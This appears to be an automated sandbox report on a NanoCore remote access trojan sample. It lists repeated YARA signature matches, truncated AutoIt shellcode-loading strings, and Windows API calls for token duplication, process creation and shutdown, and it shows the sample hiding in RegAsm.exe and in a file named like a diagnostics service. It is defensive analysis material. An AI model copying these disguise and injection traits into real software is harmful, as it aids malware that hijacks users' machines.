Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.522748241.0000000005210000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.RegAsm.exe.5210000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.RegAsm.exe.54b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.522748241.0000000005210000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.RegAsm.exe.5210000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.RegAsm.exe.54b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth

AutoIt script contains suspicious strings

Show sources

Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	AutoIt Script: 1 = 38669117 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	AutoIt Script: 792303 THEN LOCAL $LPSHELLCODE = $E ($B (ZVTZJDNXH
Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr	AutoIt Script: 1 = 38669117 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM
Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr	AutoIt Script: 792303 THEN LOCAL $LPSHELLCODE = $E ($B (ZVTZJDNXH
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	AutoIt Script: 1 = 38669117 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	AutoIt Script: 792303 THEN LOCAL $LPSHELLCODE = $E ($B (ZVTZJDNXH
Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr	AutoIt Script: 1 = 38669117 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM
Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr	AutoIt Script: 792303 THEN LOCAL $LPSHELLCODE = $E ($B (ZVTZJDNXH

Binary is likely a compiled AutoIt script file

Show sources

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: This is a third-party compiled AutoIt script.	0_2_009C3B4C
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: This is a third-party compiled AutoIt script.	0_2_009C3B4C
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, 00000000.00000000.249216138.0000000000A75000.00000002.00020000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: This is a third-party compiled AutoIt script.	12_2_00983B4C
Source: DiagnosticsHub.StandardCollector.Service.exe.bat	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: DiagnosticsHub.StandardCollector.Service.exe.bat, 0000000C.00000003.298583525.00000000035B5000.00000004.00000001.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_04EB131A NtQuerySystemInformation,	1_2_04EB131A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_04EB12DF NtQuerySystemInformation,	1_2_04EB12DF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_04EB131A NtQuerySystemInformation,	1_2_04EB131A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_04EB12DF NtQuerySystemInformation,	1_2_04EB12DF

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A240B1: CreateFileW,DeviceIoControl,CloseHandle,		0_2_00A240B1
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A240B1: CreateFileW,DeviceIoControl,CloseHandle,		0_2_00A240B1

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A18858 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,		0_2_00A18858
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A18858 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,		0_2_00A18858

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		0_2_00A2545F
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		0_2_00A2545F

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009E33C7	0_2_009E33C7
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009D4140	0_2_009D4140
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009E2405	0_2_009E2405
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009F6522	0_2_009F6522
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A40665	0_2_00A40665
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009F267E	0_2_009F267E
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009E283A	0_2_009E283A
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009F89DF	0_2_009F89DF
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A40AE2	0_2_00A40AE2
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A28B13	0_2_00A28B13
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009ECD61	0_2_009ECD61
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009F7006	0_2_009F7006
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009D3190	0_2_009D3190
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009D710E	0_2_009D710E
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009C1287	0_2_009C1287
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009EF419	0_2_009EF419
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009E16C4	0_2_009E16C4
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009E1BB8	0_2_009E1BB8
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009F9D05	0_2_009F9D05
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009E33C7	0_2_009E33C7
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009D4140	0_2_009D4140
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009E2405	0_2_009E2405
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009F6522	0_2_009F6522
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A40665	0_2_00A40665
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009F267E	0_2_009F267E
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009E283A	0_2_009E283A
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009F89DF	0_2_009F89DF
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A40AE2	0_2_00A40AE2
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A28B13	0_2_00A28B13
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009ECD61	0_2_009ECD61
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009F7006	0_2_009F7006
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009D3190	0_2_009D3190
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009D710E	0_2_009D710E
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009C1287	0_2_009C1287
